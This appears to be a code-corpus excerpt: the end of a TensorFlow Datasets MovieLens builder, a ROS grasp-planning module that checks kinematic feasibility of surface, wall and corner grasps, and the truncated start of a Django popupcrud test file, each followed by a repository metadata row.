parsing_fn=movielens_parsing.parse_100k_ratings_data,
),
MovieLensConfig(
name='100k-movies',
description=textwrap.dedent("""\
This dataset contains data of 1,682 movies rated in the 100k
dataset."""),
version='0.1.0',
format_version='100k',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-100k.zip'),
parsing_fn=movielens_parsing.parse_100k_movies_data,
),
MovieLensConfig(
name='1m-ratings',
description=textwrap.dedent("""\
This dataset contains 1,000,209 anonymous ratings of approximately
3,900 movies made by 6,040 MovieLens users who joined MovieLens in
2000. This dataset is the largest dataset that includes
demographic data.
Each user has rated at least 20 movies. Ratings are in whole-star
increments. In demographic data, age values are divided into
ranges and the lowest age value for each range is used in the data
instead of the actual values."""),
version='0.1.0',
format_version='1m',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-1m.zip'),
parsing_fn=movielens_parsing.parse_1m_ratings_data,
),
MovieLensConfig(
name='1m-movies',
description=textwrap.dedent("""\
This dataset contains data of approximately 3,900 movies rated in
the 1m dataset."""),
version='0.1.0',
format_version='1m',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-1m.zip'),
parsing_fn=movielens_parsing.parse_1m_movies_data,
),
MovieLensConfig(
name='20m-ratings',
description=textwrap.dedent("""\
This dataset contains 20,000,263 ratings across 27,278
movies, created by 138,493 users between January 09, 1995 and
March 31, 2015. This dataset was generated on October 17, 2016.
Each user has rated at least 20 movies. Ratings are in half-star
increments. This dataset does not contain demographic data."""),
version='0.1.0',
format_version='20m',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-20m.zip'),
parsing_fn=movielens_parsing.parse_current_ratings_data,
),
MovieLensConfig(
name='20m-movies',
description=textwrap.dedent("""\
This dataset contains data of 27,278 movies rated in the 20m
dataset"""),
version='0.1.0',
format_version='20m',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-20m.zip'),
parsing_fn=movielens_parsing.parse_current_movies_data,
),
]
VERSION = tfds.core.Version('0.1.0')
def _info(self) -> tfds.core.DatasetInfo:
"""Returns DatasetInfo according to self.builder_config."""
movie_features_dict = {
'movie_id':
tf.string,
'movie_title':
tf.string,
'movie_genres':
tfds.features.Sequence(
tfds.features.ClassLabel(names=[
'Action',
'Adventure',
'Animation',
'Children',
'Comedy',
'Crime',
'Documentary',
'Drama',
'Fantasy',
'Film-Noir',
'Horror',
'IMAX',
'Musical',
'Mystery',
'Romance',
'Sci-Fi',
'Thriller',
'Unknown',
'War',
'Western',
'(no genres listed)',
]),),
}
rating_features_dict = {
'user_id': tf.string,
'user_rating': tf.float32,
# Using int64 since tfds currently does not support float64.
'timestamp': tf.int64,
}
demographic_features_dict = {
'user_gender':
tf.bool,
'bucketized_user_age':
tf.float32,
'user_occupation_label':
tfds.features.ClassLabel(names=[
'academic/educator',
'artist',
'clerical/admin',
'customer service',
'doctor/health care',
'entertainment',
'executive/managerial',
'farmer',
'homemaker',
'lawyer',
'librarian',
'other/not specified',
'programmer',
'retired',
'sales/marketing',
'scientist',
'self-employed',
'student',
'technician/engineer',
'tradesman/craftsman',
'unemployed',
'writer',
]),
'user_occupation_text':
tf.string,
'user_zip_code':
tf.string,
}
features_dict = {}
if self.builder_config.table_option == 'movies':
features_dict.update(movie_features_dict)
# For the other cases, self.builder_config.table_option == 'ratings'.
# Older versions of MovieLens (1m, 100k) have demographic features.
elif self.builder_config.format_version == '1m':
features_dict.update(movie_features_dict)
features_dict.update(rating_features_dict)
features_dict.update(demographic_features_dict)
elif self.builder_config.format_version == '100k':
# Only the 100k dataset contains exact user ages. The 1m dataset
# contains only bucketized age values.
features_dict.update(movie_features_dict)
features_dict.update(rating_features_dict)
features_dict.update(demographic_features_dict)
features_dict.update(raw_user_age=tf.float32)
else:
features_dict.update(movie_features_dict)
features_dict.update(rating_features_dict)
return tfds.core.DatasetInfo(
builder=self,
description=_DESCRIPTION,
features=tfds.features.FeaturesDict(features_dict),
supervised_keys=None,
homepage='https://grouplens.org/datasets/movielens/',
citation=_CITATION,
)
def _split_generators(
self, dl_manager: tfds.download.DownloadManager
) -> List[tfds.core.SplitGenerator]:
"""Returns SplitGenerators."""
extracted_path = dl_manager.download_and_extract(
self.builder_config.download_url,)
dir_path = os.path.join(
extracted_path,
'ml-%s' % self.builder_config.format_version,
)
return [
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
gen_kwargs={'dir_path': dir_path},
),
]
def _generate_examples(
self,
dir_path: Optional[str] = None) -> Iterator[Tuple[int, Dict[str, Any]]]:
"""Yields examples by calling the corresponding parsing function."""
for ex in self.builder_config.parsing_fn(dir_path):
yield ex
class MovieLens(Movielens):
"""MovieLens rating dataset (deprecated handle version)."""
def __init__(self, **kwargs):
logging.warning(
'The handle "movie_lens" for the MovieLens dataset is deprecated. '
'Prefer using "movielens" instead.')
super(MovieLens, self).__init__(**kwargs)
| apache-2.0 | 1,772,383,642,943,722,500 | 37.592672 | 80 | 0.612833 | false |
SoMa-Project/ec_grasp_planner | ec_grasp_planner/src/tub_feasibility_check_interface.py | 1 | 30753 | import math
import rospy
import numpy as np
from tf import transformations as tra
from geometry_graph_msgs.msg import Node, geometry_msgs
from tub_feasibility_check import srv as kin_check_srv
from tub_feasibility_check.msg import BoundingBoxWithPose, AllowedCollision
from tub_feasibility_check.srv import CheckKinematicsResponse
from shape_msgs.msg import SolidPrimitive
import GraspFrameRecipes
import planner_utils as pu
class AlternativeBehavior:
# TODO this class should be adapted if return value of the feasibility check changes (e.g. switch conditions)
def __init__(self, feasibility_check_result, init_conf):
self.number_of_joints = len(feasibility_check_result.final_configuration)
self.trajectory_steps = []
for i in range(0, len(feasibility_check_result.trajectory), self.number_of_joints):
self.trajectory_steps.append(feasibility_check_result.trajectory[i:i+self.number_of_joints])
if np.allclose(init_conf, self.trajectory_steps[0]):
rospy.logwarn("Initial configuration {0} is first point in trajectory".format(init_conf))
# :1 = skip the initial position TODO remove if relative is used!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
self.trajectory_steps = self.trajectory_steps[1:]
def assert_that_initial_config_not_included(self, init_conf):
if np.allclose(init_conf, self.trajectory_steps[0]):
raise ValueError("Initial configuration {0} is first point in trajectory".format(init_conf))
def get_trajectory(self):
print("get_trajectory LEN:", len(self.trajectory_steps))
return np.transpose(np.array(self.trajectory_steps))
class FeasibilityQueryParameters:
def __init__(self, checked_motions, goals, allowed_collisions, goal_manifold_frames, goal_manifold_orientations):
# TODO change multiple dictionaries to one Motion class?
# This list includes the checked motions in order (They have to be sequential!)
self.checked_motions = checked_motions
# The goal poses of the respective motions in op-space (index has to match index of checked_motions)
self.goals = goals
# The collisions that are allowed in message format per motion
self.allowed_collisions = allowed_collisions
# TODO docu
self.goal_manifold_frames = goal_manifold_frames
# TODO docu
self.goal_manifold_orientations = goal_manifold_orientations
def get_matching_ifco_wall(ifco_in_base_transform, ec_frame):
# transforms points in base frame to ifco frame
base_in_ifco_transform = tra.inverse_matrix(ifco_in_base_transform)
# ec x axis in ifco frame
ec_x_axis = base_in_ifco_transform.dot(ec_frame)[0:3, 0]
ec_z_axis = base_in_ifco_transform.dot(ec_frame)[0:3, 2]
# we can't check for zero because of small errors in the frame (due to vision or numerical uncertainty)
space_thresh = 0.1
# one could also check for dot-product = 0 instead of using the x-axis but this is prone to the same errors
if ec_z_axis.dot(np.array([1, 0, 0])) > space_thresh and ec_x_axis.dot(np.array([0, 1, 0])) > space_thresh:
# print("GET MATCHING=SOUTH", tf_dbg_call_to_string(ec_frame, frame_name='ifco_south'))
return 'south'
elif ec_z_axis.dot(np.array([1, 0, 0])) < -space_thresh and ec_x_axis.dot(np.array([0, 1, 0])) < -space_thresh:
# print("GET MATCHING=NORTH", tf_dbg_call_to_string(ec_frame, frame_name='ifco_north'))
return 'north'
elif ec_z_axis.dot(np.array([0, 1, 0])) < -space_thresh and ec_x_axis.dot(np.array([1, 0, 0])) > space_thresh:
# print("GET MATCHING=WEST", tf_dbg_call_to_string(ec_frame, frame_name='ifco_west'))
return 'west'
elif ec_z_axis.dot(np.array([0, 1, 0])) > space_thresh and ec_x_axis.dot(np.array([1, 0, 0])) < -space_thresh:
# print("GET MATCHING=EAST", tf_dbg_call_to_string(ec_frame, frame_name='ifco_east'))
return 'east'
else:
# This should never be reached. Just here to prevent bugs
raise ValueError("ERROR: Could not identify matching ifco wall. Check frames!")
def get_matching_ifco_corner(ifco_in_base_transform, ec_frame):
# transforms points in base frame to ifco frame
base_in_ifco_transform = tra.inverse_matrix(ifco_in_base_transform)
# ec (corner) z-axis in ifco frame
ec_z_axis = base_in_ifco_transform.dot(ec_frame)[0:3, 2]
# we can't check for zero because of small errors in the frame (due to vision or numerical uncertainty)
space_thresh = 0.0 # 0.1
if ec_z_axis.dot(np.array([1, 0, 0])) > space_thresh and ec_z_axis.dot(np.array([0, 1, 0])) > space_thresh:
print("GET MATCHING=SOUTH_EAST", pu.tf_dbg_call_to_string(ec_frame, frame_name='ifco_southeast'))
return 'south', 'east'
elif ec_z_axis.dot(np.array([1, 0, 0])) > space_thresh and ec_z_axis.dot(np.array([0, 1, 0])) < -space_thresh:
print("GET MATCHING=SOUTH_WEST", pu.tf_dbg_call_to_string(ec_frame, frame_name='ifco_southwest'))
return 'south', 'west'
elif ec_z_axis.dot(np.array([1, 0, 0])) < -space_thresh and ec_z_axis.dot(np.array([0, 1, 0])) < -space_thresh:
print("GET MATCHING=NORTH_WEST", pu.tf_dbg_call_to_string(ec_frame, frame_name='ifco_northwest'))
return 'north', 'west'
elif ec_z_axis.dot(np.array([1, 0, 0])) < -space_thresh and ec_z_axis.dot(np.array([0, 1, 0])) > space_thresh:
print("GET MATCHING=NORTH_EAST", pu.tf_dbg_call_to_string(ec_frame, frame_name='ifco_northeast'))
return 'north', 'east'
else:
# This should never be reached. Just here to prevent bugs
raise ValueError("ERROR: Could not identify matching ifco wall. Check frames!")
# Checks if the Y-Axis of the ifco frame points towards the robot (origin of base frame)
# The base frame is assumed to be the following way:
# x points to the robots front
# y points to the robots left (if you are behind the robot)
# z points upwards
def ifco_transform_needs_to_be_flipped(ifco_in_base_transform):
# we can't check for zero because of small errors in the frame (due to vision or numerical uncertainty)
space_thresh = 0.05
x_of_yaxis = ifco_in_base_transform[0, 1]
x_of_translation = ifco_in_base_transform[0, 3]
print(ifco_in_base_transform)
print(space_thresh, x_of_yaxis, x_of_translation)
if x_of_translation > space_thresh:
# ifco is in front of robot
return x_of_yaxis > 0
elif x_of_translation < space_thresh:
# ifco is behind the robot
return x_of_yaxis < 0
else:
y_of_translation = ifco_in_base_transform[1, 3]
y_of_yaxis = ifco_in_base_transform[1, 1]
if y_of_translation < 0:
# ifco is to the right of the robot
return y_of_yaxis < 0
else:
# ifco is to the left of the robot
return y_of_yaxis > 0
# This function will call TUB's feasibility checker to check a motion.
# If the motion is not feasible it will try to generate an alternative joint trajectory and place it into
# the given stored_trajectories argument (dictionary).
def check_kinematic_feasibility(current_object_idx, objects, object_params, current_ec_index, strategy, all_ec_frames,
ifco_in_base_transform, handarm_params, stored_trajectories):
if handarm_params is None:
raise ValueError("HandArmParameters can't be None, check callstack!")
print("IFCO_BEFORE", pu.tf_dbg_call_to_string(ifco_in_base_transform, frame_name='ifco_before'))
if ifco_transform_needs_to_be_flipped(ifco_in_base_transform):
# flip the ifco transform such that it fulfills the requirements of the feasibilty checker
# (y-axis of ifco points towards the robot)
rospy.loginfo("Flip ifco transform for tub feasibilty checker")
zflip_transform = tra.rotation_matrix(math.radians(180.0), [0, 0, 1])
ifco_in_base_transform = ifco_in_base_transform.dot(zflip_transform)
print("IFCO_AFTER", pu.tf_dbg_call_to_string(ifco_in_base_transform, frame_name='ifco_after'))
object = objects[current_object_idx]
ec_frame = all_ec_frames[current_ec_index]
if object['type'] in handarm_params[strategy]:
params = handarm_params[strategy][object['type']]
else:
params = handarm_params[strategy]['object']
# The initial joint configuration (goToView config)
# curr_start_config = rospy.get_param('planner_gui/robot_view_position') # TODO use current joint state instead?
# TODO also check gotToView -> params['initial_goal'] (requires forward kinematics, or change to op-space)
curr_start_config = params['initial_goal']
if strategy == 'SurfaceGrasp':
call_params = prepare_surface_grasp_parameter(objects, current_object_idx, object_params, params)
elif strategy == "WallGrasp":
selected_wall_name = get_matching_ifco_wall(ifco_in_base_transform, ec_frame)
print("FOUND_EC: ", selected_wall_name)
blocked_ecs = ['north', 'east', 'west'] # TODO move to config file?
if selected_wall_name in blocked_ecs:
rospy.loginfo("Skipped wall " + selected_wall_name + " (Blacklisted)")
return 0
call_params = prepare_wall_grasp_parameter(ec_frame, selected_wall_name, objects, current_object_idx,
object_params, ifco_in_base_transform, params)
elif strategy == "CornerGrasp":
selected_wall_names = get_matching_ifco_corner(ifco_in_base_transform, ec_frame)
print("FOUND_EC: ", selected_wall_names)
blocked_ecs = [('north', 'east'), ('north', 'west'), ('south', 'west')] # TODO move to config file?
if selected_wall_names in blocked_ecs:
rospy.loginfo("Skipped corner " + selected_wall_names[0] + selected_wall_names[1] + " (Blacklisted)")
return 0
call_params = prepare_corner_grasp_parameter(ec_frame, selected_wall_names, objects, current_object_idx,
object_params, ifco_in_base_transform, params)
else:
raise ValueError("Kinematics checks are currently only supported for surface, wall and corner grasps, "
"but strategy was " + strategy)
# initialize stored trajectories for the given object
stored_trajectories[(current_object_idx, current_ec_index)] = {}
# The pose of the ifco (in base frame) in message format
ifco_pose = pu.transform_to_pose_msg(ifco_in_base_transform)
print("IFCO_POSE", ifco_pose)
# The bounding boxes of all objects in message format
bounding_boxes = []
for obj in objects:
obj_pose = pu.transform_to_pose_msg(obj['frame'])
obj_bbox = SolidPrimitive(type=SolidPrimitive.BOX,
dimensions=[obj['bounding_box'].x, obj['bounding_box'].y, obj['bounding_box'].z])
bounding_boxes.append(BoundingBoxWithPose(box=obj_bbox, pose=obj_pose))
print("BOUNDING_BOXES", bounding_boxes)
all_steps_okay = True
# perform the actual checks
for motion, curr_goal in zip(call_params.checked_motions, call_params.goals):
manifold_name = motion + '_manifold'
goal_pose = pu.transform_to_pose_msg(curr_goal)
print("GOAL_POSE", goal_pose)
print("INIT_CONF", curr_start_config)
goal_manifold_frame = pu.transform_to_pose_msg(call_params.goal_manifold_frames[motion])
goal_manifold_orientation = geometry_msgs.msg.Quaternion(x=call_params.goal_manifold_orientations[motion][0],
y=call_params.goal_manifold_orientations[motion][1],
z=call_params.goal_manifold_orientations[motion][2],
w=call_params.goal_manifold_orientations[motion][3])
check_feasibility = rospy.ServiceProxy('/check_kinematics', kin_check_srv.CheckKinematics)
print("allowed", call_params.allowed_collisions[motion])
print("Call check kinematics for " + motion + " (" + strategy + ")\nGoal:\n" + str(curr_goal))
res = check_feasibility(initial_configuration=curr_start_config,
goal_pose=goal_pose,
ifco_pose=ifco_pose,
bounding_boxes_with_poses=bounding_boxes,
goal_manifold_frame=goal_manifold_frame,
min_position_deltas=params[manifold_name]['min_position_deltas'],
max_position_deltas=params[manifold_name]['max_position_deltas'],
goal_manifold_orientation=goal_manifold_orientation,
min_orientation_deltas=params[manifold_name]['min_orientation_deltas'],
max_orientation_deltas=params[manifold_name]['max_orientation_deltas'],
allowed_collisions=call_params.allowed_collisions[motion]
)
print("check feasibility result was: " + str(res.status))
if res.status == CheckKinematicsResponse.FAILED:
# trajectory is not feasible and no alternative was found, directly return 0
return 0
elif res.status == CheckKinematicsResponse.REACHED_SAMPLED:
# original trajectory is not feasible, but alternative was found => save it
stored_trajectories[(current_object_idx, current_ec_index)][motion] = AlternativeBehavior(res, curr_start_config)
curr_start_config = res.final_configuration
all_steps_okay = False
print("FOUND ALTERNATIVE. New Start: ", curr_start_config)
elif res.status == CheckKinematicsResponse.REACHED_INITIAL:
# original trajectory is feasible, we save the alternative in case a later motion is not possible.
stored_trajectories[(current_object_idx, current_ec_index)][motion] = AlternativeBehavior(res, curr_start_config)
curr_start_config = res.final_configuration
print("USE NORMAL. Start: ", curr_start_config)
else:
raise ValueError(
"check_kinematics: No handler for result status of {} implemented".format(res.status))
if all_steps_okay:
# if all steps are okay use original trajectory TODO only replace preceding steps!
stored_trajectories[(current_object_idx, current_ec_index)] = {}
pass
# Either the initial trajectory was possible or an alternative behavior was generated
return 1.0
def prepare_surface_grasp_parameter(objects, current_object_idx, object_params, params):
# use kinematic checks
# TODO create proxy; make it a persistent connection?
# Code duplication from planner.py TODO put at a shared location
# Set the initial pose above the object
goal_ = np.copy(object_params['frame']) # TODO: this should be support_surface_frame
goal_[:3, 3] = tra.translation_from_matrix(object_params['frame'])
goal_ = goal_.dot(params['hand_transform'])
# the grasp frame is symmetrical - check which side is nicer to reach
# this is a hacky first version for our WAM
zflip_transform = tra.rotation_matrix(math.radians(180.0), [0, 0, 1])
if goal_[0][0] < 0:
goal_ = goal_.dot(zflip_transform)
# hand pose above object
pre_grasp_pose = goal_.dot(params['pre_approach_transform'])
# down_dist = params['down_dist'] # dist lower than ifco bottom: behavior of the high level planner
# dist = z difference to object centroid (both transformations are w.r.t. to world frame
# (more realistic behavior since we have to touch the object for a successful grasp)
down_dist = pre_grasp_pose[2, 3] - object_params['frame'][2, 3] # get z-translation difference
# goal pose for go down movement
go_down_pose = tra.translation_matrix([0, 0, -down_dist]).dot(pre_grasp_pose)
post_grasp_pose = params['post_grasp_transform'].dot(
go_down_pose) # TODO it would be better to allow relative motion as goal frames
checked_motions = ["pre_approach",
"go_down"] # , "post_grasp_rot"] ,go_up, go_drop_off # TODO what about remaining motions? (see wallgrasp)
goals = [pre_grasp_pose, go_down_pose] # , post_grasp_pose]
# TODO what about using the bounding boxes as for automatic goal manifold calculation?
# Take orientation of object but translation of pre grasp pose
pre_grasp_pos_manifold = np.copy(object_params['frame'])
pre_grasp_pos_manifold[:3, 3] = tra.translation_from_matrix(pre_grasp_pose)
goal_manifold_frames = {
'pre_approach': pre_grasp_pos_manifold,
# Use object frame for resampling
'go_down': np.copy(object_params['frame']) # TODO change that again to go_down_pose!?
}
goal_manifold_orientations = {
# use hand orientation
'pre_approach': tra.quaternion_from_matrix(pre_grasp_pose),
# Use object orientation
'go_down': tra.quaternion_from_matrix(go_down_pose),
# tra.quaternion_from_matrix(object_params['frame']) # TODO use hand orietation instead?
}
# The collisions that are allowed per motion in message format
allowed_collisions = {
# no collisions are allowed during going to pre_grasp pose
'pre_approach': [],
'go_down': [AllowedCollision(type=AllowedCollision.BOUNDING_BOX, box_id=current_object_idx,
terminating=True, required=True),
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT,
constraint_name='bottom', terminating=False)] +
[AllowedCollision(type=AllowedCollision.BOUNDING_BOX, box_id=obj_idx, terminating=False)
for obj_idx, o in enumerate(objects) if obj_idx != current_object_idx and
params['go_down_allow_touching_other_objects']
],
# TODO also account for the additional object in a way?
'post_grasp_rot': [AllowedCollision(type=AllowedCollision.BOUNDING_BOX, box_id=current_object_idx,
terminating=True),
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT,
constraint_name='bottom', terminating=False)]
}
print("ALLOWED COLLISIONS:", allowed_collisions)
return FeasibilityQueryParameters(checked_motions, goals, allowed_collisions, goal_manifold_frames,
goal_manifold_orientations)
def prepare_wall_grasp_parameter(ec_frame, selected_wall_name, objects, current_object_idx, object_params,
ifco_in_base_transform, params):
# hand pose above and behind the object
pre_approach_transform = params['pre_approach_transform']
wall_frame = np.copy(ec_frame)
wall_frame[:3, 3] = tra.translation_from_matrix(object_params['frame'])
# apply hand transformation
ec_hand_frame = wall_frame.dot(params['hand_transform'])
# ec_hand_frame = (ec_frame.dot(params['hand_transform']))
pre_approach_pose = ec_hand_frame.dot(pre_approach_transform)
# down_dist = params['down_dist'] # dist lower than ifco bottom: behavior of the high level planner
# dist = z difference to ifco bottom minus hand frame offset (dist from hand frame to collision point)
# (more realistic behavior since we have a force threshold when going down to the bottom)
bounded_down_dist = pre_approach_pose[2, 3] - ifco_in_base_transform[2, 3]
hand_frame_to_bottom_offset = 0.07 # 7cm TODO maybe move to handarm_parameters.py
bounded_down_dist = min(params['down_dist'], bounded_down_dist - hand_frame_to_bottom_offset)
# goal pose for go down movement
go_down_pose = tra.translation_matrix([0, 0, -bounded_down_dist]).dot(pre_approach_pose)
# pose after lifting. This is somewhat fake, since the real go_down_pose will be determined by
# the FT-Switch during go_down and the actual lifted distance by the TimeSwitch (or a pose switch in case
# the robot allows precise small movements) TODO better solution?
fake_lift_up_dist = np.min([params['lift_dist'], 0.01]) # 1cm
corrective_lift_pose = tra.translation_matrix([0, 0, fake_lift_up_dist]).dot(go_down_pose)
dir_wall = tra.translation_matrix([0, 0, -params['sliding_dist']])
# TODO sliding_distance should be computed from wall and hand frame.
# slide direction is given by the normal of the wall
wall_frame = np.copy(ec_frame)
dir_wall[:3, 3] = wall_frame[:3, :3].dot(dir_wall[:3, 3])
# normal goal pose behind the wall
slide_to_wall_pose = dir_wall.dot(corrective_lift_pose)
# now project it into the wall plane!
z_projection = np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 1]])
to_wall_plane_transform = wall_frame.dot(z_projection.dot(tra.inverse_matrix(wall_frame).dot(slide_to_wall_pose)))
slide_to_wall_pose[:3, 3] = tra.translation_from_matrix(to_wall_plane_transform)
# TODO remove code duplication with planner.py (refactor code snippets to function calls) !!!!!!!
checked_motions = ['pre_approach', 'go_down', 'corrective_lift',
'slide_to_wall'] # TODO overcome problem of FT-Switch after go_down
goals = [pre_approach_pose, go_down_pose, corrective_lift_pose, slide_to_wall_pose] # TODO see checked_motions
# Take orientation of object but translation of pre grasp pose
pre_grasp_pos_manifold = np.copy(object_params['frame'])
pre_grasp_pos_manifold[:3, 3] = tra.translation_from_matrix(pre_approach_pose)
slide_pos_manifold = np.copy(slide_to_wall_pose)
goal_manifold_frames = {
'pre_approach': pre_grasp_pos_manifold,
# Use object frame for sampling
'go_down': np.copy(go_down_pose),
'corrective_lift': np.copy(corrective_lift_pose),
# should always be the same frame as go_down # TODO use world orientation?
# Use wall frame for sampling. Keep in mind that the wall frame has different orientation, than world.
'slide_to_wall': slide_pos_manifold,
}
goal_manifold_orientations = {
# use hand orientation
'pre_approach': tra.quaternion_from_matrix(pre_approach_pose),
# Use object orientation
'go_down': tra.quaternion_from_matrix(go_down_pose), # TODO use hand orietation instead?
# should always be the same orientation as go_down
'corrective_lift': tra.quaternion_from_matrix(corrective_lift_pose),
# use wall orientation
'slide_to_wall': tra.quaternion_from_matrix(wall_frame),
}
allowed_collisions = {
# 'init_joint': [],
# no collisions are allowed during going to pre_grasp pose
'pre_approach': [],
# Only allow touching the bottom of the ifco
'go_down': [AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT, constraint_name='bottom',
terminating=False),
],
'corrective_lift': [AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT, constraint_name='bottom',
terminating=False),
],
# TODO also allow all other obejcts to be touched during sliding motion
'slide_to_wall': [
# Allow all other objects to be touched as well
# (since hand will go through them in simulation) TODO desired behavior?
AllowedCollision(type=AllowedCollision.BOUNDING_BOX, box_id=obj_idx,
terminating=False, required=obj_idx == current_object_idx)
for obj_idx in range(0, len(objects))
] + [
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT,
constraint_name=selected_wall_name, terminating=False),
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT, constraint_name='bottom',
terminating=False),
],
}
return FeasibilityQueryParameters(checked_motions, goals, allowed_collisions, goal_manifold_frames,
goal_manifold_orientations)
def prepare_corner_grasp_parameter(ec_frame, selected_wall_names, objects, current_object_idx, object_params,
ifco_in_base_transform, params):
# hand pose above and behind the object
pre_approach_transform = params['pre_approach_transform']
corner_frame = np.copy(ec_frame)
print("Prepare Corner: ", pu.tf_dbg_call_to_string(corner_frame, "prepare"))
used_ec_frame, corner_frame_alpha_zero = GraspFrameRecipes.get_derived_corner_grasp_frames(corner_frame,
object_params['frame'])
pre_approach_pose = used_ec_frame.dot(params['hand_transform'].dot(pre_approach_transform)) # TODO order of hand and pre_approach
# down_dist = params['down_dist'] # dist lower than ifco bottom: behavior of the high level planner
# dist = z difference to ifco bottom minus hand frame offset (dist from hand frame to collision point)
# (more realistic behavior since we have a force threshold when going down to the bottom)
bounded_down_dist = pre_approach_pose[2, 3] - ifco_in_base_transform[2, 3]
hand_frame_to_bottom_offset = 0.07 # 7cm TODO maybe move to handarm_parameters.py
bounded_down_dist = min(params['down_dist'], bounded_down_dist - hand_frame_to_bottom_offset)
# goal pose for go down movement
go_down_pose = tra.translation_matrix([0, 0, -bounded_down_dist]).dot(pre_approach_pose)
# pose after lifting. This is somewhat fake, since the real go_down_pose will be determined by
# the FT-Switch during go_down and the actual lifted distance by the TimeSwitch (or a pose switch in case
# the robot allows precise small movements) TODO better solution?
fake_lift_up_dist = np.min([params['lift_dist'], 0.01]) # 1cm
corrective_lift_pose = tra.translation_matrix([0, 0, fake_lift_up_dist]).dot(go_down_pose)
sliding_dist = params['sliding_dist']
wall_dir = tra.translation_matrix([0, 0, -sliding_dist])
# slide direction is given by the corner_frame_alpha_zero
wall_dir[:3, 3] = corner_frame_alpha_zero[:3, :3].dot(wall_dir[:3, 3])
slide_to_wall_pose = wall_dir.dot(corrective_lift_pose)
# now project it into the wall plane!
z_projection = np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 1]])
to_wall_plane_transform = corner_frame_alpha_zero.dot(z_projection.dot(tra.inverse_matrix(corner_frame_alpha_zero).dot(slide_to_wall_pose)))
slide_to_wall_pose[:3, 3] = tra.translation_from_matrix(to_wall_plane_transform)
checked_motions = ['pre_approach', 'go_down', 'corrective_lift', 'slide_to_wall']
goals = [pre_approach_pose, go_down_pose, corrective_lift_pose, slide_to_wall_pose]
# Take orientation of object but translation of pre grasp pose
pre_grasp_pos_manifold = np.copy(object_params['frame'])
pre_grasp_pos_manifold[:3, 3] = tra.translation_from_matrix(pre_approach_pose)
slide_pos_manifold = np.copy(slide_to_wall_pose)
goal_manifold_frames = {
'pre_approach': pre_grasp_pos_manifold,
# Use object frame for sampling
'go_down': np.copy(go_down_pose),
'corrective_lift': np.copy(corrective_lift_pose),
# should always be the same frame as go_down # TODO use world orientation?
# Use wall frame for sampling. Keep in mind that the wall frame has different orientation, than world.
'slide_to_wall': slide_pos_manifold,
}
goal_manifold_orientations = {
# use hand orientation
'pre_approach': tra.quaternion_from_matrix(pre_approach_pose),
# Use object orientation
'go_down': tra.quaternion_from_matrix(go_down_pose), # TODO use hand orietation instead?
# should always be the same orientation as go_down
'corrective_lift': tra.quaternion_from_matrix(corrective_lift_pose),
# use wall orientation
'slide_to_wall': tra.quaternion_from_matrix(corner_frame), # TODO is that the right one?
}
allowed_collisions = {
# 'init_joint': [],
# no collisions are allowed during going to pre_grasp pose
'pre_approach': [],
# Only allow touching the bottom of the ifco
'go_down': [AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT, constraint_name='bottom',
terminating=False),
],
'corrective_lift': [AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT, constraint_name='bottom',
terminating=False),
],
'slide_to_wall': [
# Allow all other objects to be touched as well
# (since hand will go through them in simulation)
AllowedCollision(type=AllowedCollision.BOUNDING_BOX, box_id=obj_idx,
terminating=False, required=obj_idx == current_object_idx)
for obj_idx in range(0, len(objects))
] + [
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT,
constraint_name=selected_wall_names[0], terminating=False),
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT,
constraint_name=selected_wall_names[1], terminating=False),
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT, constraint_name='bottom',
terminating=False),
],
}
return FeasibilityQueryParameters(checked_motions, goals, allowed_collisions, goal_manifold_frames,
goal_manifold_orientations)
| bsd-3-clause | -5,692,163,671,882,151,000 | 48.126198 | 147 | 0.632426 | false |
harikvpy/django-popupcrud | test/tests.py | 1 | 14507 | # -*- coding: utf-8 -*-
# pylint: skip-file
import re
import json
from django.test import TestCase
from django.http import JsonResponse
try:
from django.urls import reverse
except expression as identifier:
from django.core.urlresolvers import reverse
import six
from .models import Author, Book
from .views import AuthorCrudViewset, BookCrudViewset, BookUUIDCrudViewSet
RE_CREATE_EDIT_FORM = r"\n<form class=\'form-horizontal\' id=\'create-edit-form\' action=\'{0}\' method=\'post\' accept-charset=\'utf-8\'>.*</form>"
MODAL_PATTERNS = [
r'<div class="modal fade".*id="create-edit-modal"',
r'<div class="modal fade".*id="delete-modal"',
r'<div class="modal fade".*id="action-result-modal"',
r'<div class="modal fade".*id="add-related-modal"',
]
class PopupCrudViewSetTests(TestCase):
def test_settings(self):
from popupcrud.views import POPUPCRUD
self.assertEquals(POPUPCRUD['base_template'], "test/base.html")
def test_template(self):
author = Author.objects.create(name="John", age=26)
response = self.client.get(reverse("authors"))
self.assertTemplateUsed(response, "popupcrud/list.html")
# template should have the three embedded bootstrap modals
for pattern in MODAL_PATTERNS:
self.assertTrue(
re.search(pattern, response.content.decode('utf-8')))
def test_list_display(self):
name = "John"
author = Author.objects.create(name=name, age=26)
response = self.client.get(reverse("authors"))
html = response.content.decode('utf-8')
self.assertTrue(
re.search(r'<th.*sortable.*>.*Name.*</th>', html, re.DOTALL))
self.assertTrue(
re.search(r'<th.*sortable.*>.*Age.*</th>', html, re.DOTALL))
self.assertTrue(
re.search(r'<th.*sortable.*>.*Half Age.*</th>', html, re.DOTALL))
self.assertTrue(
re.search(r'<th.*Double Age.*</th>', html, re.DOTALL))
self.assertFalse(
re.search(r'<th.*sortable.*>.*DOUBLE AGE.*</th>', html, re.DOTALL))
# also tests the get_obj_name() method
